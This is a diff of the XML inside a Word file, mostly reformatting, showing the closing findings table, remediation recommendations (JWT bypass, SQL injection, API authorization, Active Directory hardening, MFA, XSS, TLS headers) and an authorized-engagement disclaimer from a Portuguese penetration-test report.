-              <w:t xml:space="preserve">Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -5996,17 +6412,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">Baixo</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>Baixo</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -6016,17 +6433,18 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">1d</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="40"/>
-              <w:left w:type="dxa" w:w="60"/>
-              <w:bottom w:type="dxa" w:w="40"/>
-              <w:right w:type="dxa" w:w="60"/>
+              <w:t>1d</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcMar>
+              <w:top w:w="40" w:type="dxa"/>
+              <w:left w:w="60" w:type="dxa"/>
+              <w:bottom w:w="40" w:type="dxa"/>
+              <w:right w:w="60" w:type="dxa"/>
             </w:tcMar>
           </w:tcPr>
           <w:p>
@@ -6038,7 +6456,7 @@
                 <w:sz w:val="15"/>
                 <w:szCs w:val="15"/>
               </w:rPr>
-              <w:t xml:space="preserve">—</w:t>
+              <w:t>—</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6046,7 +6464,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:before="220"/>
+        <w:spacing w:before="220"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6056,13 +6474,13 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">SEÇÃO 7</w:t>
+        <w:t>SEÇÃO 7</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pBdr>
-          <w:bottom w:val="single" w:color="194FE3" w:sz="12" w:space="4"/>
+          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
         </w:pBdr>
         <w:spacing w:after="60"/>
       </w:pPr>
@@ -6074,12 +6492,12 @@
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-        <w:t xml:space="preserve">Apêndice</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Apêndice</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6089,7 +6507,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Recomendações estratégicas</w:t>
+        <w:t>Recomendações estratégicas</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6115,7 +6533,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Corrigir o bypass de JWT (F-01) e a SQL Injection (F-02) — exploráveis remotamente sem autenticação.</w:t>
+        <w:t>Corrigir o bypass de JWT (F-01) e a SQL Injection (F-02) — exploráveis remotamente sem autenticação.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6141,7 +6559,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Revisar a autorização por objeto na API (F-03) para conter exposição de PII.</w:t>
+        <w:t>Revisar a autorização por objeto na API (F-03) para conter exposição de PII.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6167,7 +6585,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Endurecer o Active Directory: gMSA para contas de serviço (F-04) e SMB signing (F-06).</w:t>
+        <w:t>Endurecer o Active Directory: gMSA para contas de serviço (F-04) e SMB signing (F-06).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6193,7 +6611,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exigir MFA no acesso remoto (F-07) e aplicar CSP/sanitização contra XSS (F-05).</w:t>
+        <w:t>Exigir MFA no acesso remoto (F-07) e aplicar CSP/sanitização contra XSS (F-05).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6219,7 +6637,7 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Padronizar cabeçalhos de segurança/TLS (F-08) e reduzir divulgação de informação (F-09, F-10).</w:t>
+        <w:t>Padronizar cabeçalhos de segurança/TLS (F-08) e reduzir divulgação de informação (F-09, F-10).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6245,12 +6663,12 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Reexecutar o engajamento (reteste) para validar todas as correções.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="40" w:before="120"/>
+        <w:t>Reexecutar o engajamento (reteste) para validar todas as correções.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="40"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -6260,7 +6678,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Aviso</w:t>
+        <w:t>Aviso</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6274,17 +6692,17 @@
           <w:sz w:val="19"/>
           <w:szCs w:val="19"/>
         </w:rPr>
-        <w:t xml:space="preserve">Relatório gerado por Suricatoos a partir de um engajamento autorizado. Conteúdo confidencial; distribua apenas a partes autorizadas. As provas de conceito foram não destrutivas e limitadas ao escopo acordado.</w:t>
+        <w:t>Relatório gerado por Suricatoos a partir de um engajamento autorizado. Conteúdo confidencial; distribua apenas a partes autorizadas. As provas de conceito foram não destrutivas e limitadas ao escopo acordado.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId7"/>
-      <w:headerReference w:type="first" r:id="rId8"/>
-      <w:footerReference w:type="default" r:id="rId9"/>
-      <w:footerReference w:type="first" r:id="rId10"/>
-      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
+      <w:headerReference w:type="default" r:id="rId17"/>
+      <w:footerReference w:type="default" r:id="rId18"/>
+      <w:headerReference w:type="first" r:id="rId19"/>
+      <w:footerReference w:type="first" r:id="rId20"/>
+      <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1080" w:right="1080" w:bottom="1080" w:left="1080" w:header="708" w:footer="708" w:gutter="0"/>
-      <w:pgNumType/>
+      <w:cols w:space="720"/>
       <w:titlePg/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
@@ -6292,23 +6710,10 @@
 </w:document>
 </file>
 
-<file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
-<w:comments xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape"/>
-</file>
-
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="EndnoteReference"/>
-        </w:rPr>
-        <w:endnoteRef/>
-      </w:r>
       <w:r>
         <w:separator/>
       </w:r>
@@ -6316,15 +6721,6 @@
   </w:endnote>
   <w:endnote w:type="continuationSeparator" w:id="0">
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="EndnoteReference"/>
-        </w:rPr>
-        <w:endnoteRef/>
-      </w:r>
       <w:r>
         <w:continuationSeparator/>
       </w:r>
@@ -6334,11 +6730,11 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:pBdr>
-        <w:top w:val="single" w:color="E2E8F0" w:sz="6" w:space="2"/>
+        <w:top w:val="single" w:sz="6" w:space="2" w:color="E2E8F0"/>
       </w:pBdr>
       <w:tabs>
         <w:tab w:val="right" w:pos="9360"/>
@@ -6350,7 +6746,7 @@
         <w:sz w:val="13"/>
         <w:szCs w:val="13"/>
       </w:rPr>
-      <w:t xml:space="preserve">Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
+      <w:t>Avaliação de Segurança Ofensiva — Aplicação Web e Active Directory</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -6358,15 +6754,97 @@
         <w:sz w:val="13"/>
         <w:szCs w:val="13"/>
       </w:rPr>
-      <w:t xml:space="preserve">	Página </w:t>
+      <w:tab/>
+      <w:t xml:space="preserve">Página </w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="begin"/>
-      <w:instrText xml:space="preserve">PAGE</w:instrText>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
+      <w:instrText>PAGE</w:instrText>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="separate"/>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:noProof/>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
+      <w:t>2</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="end"/>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:t xml:space="preserve"> de </w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="begin"/>
-      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
+      <w:instrText>NUMPAGES</w:instrText>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="separate"/>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:noProof/>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
+      <w:t>3</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="64748B"/>
+        <w:sz w:val="13"/>
+        <w:szCs w:val="13"/>
+      </w:rPr>
       <w:fldChar w:fldCharType="end"/>
     </w:r>
   </w:p>
@@ -6374,24 +6852,15 @@
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p/>
 </w:ftr>
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" 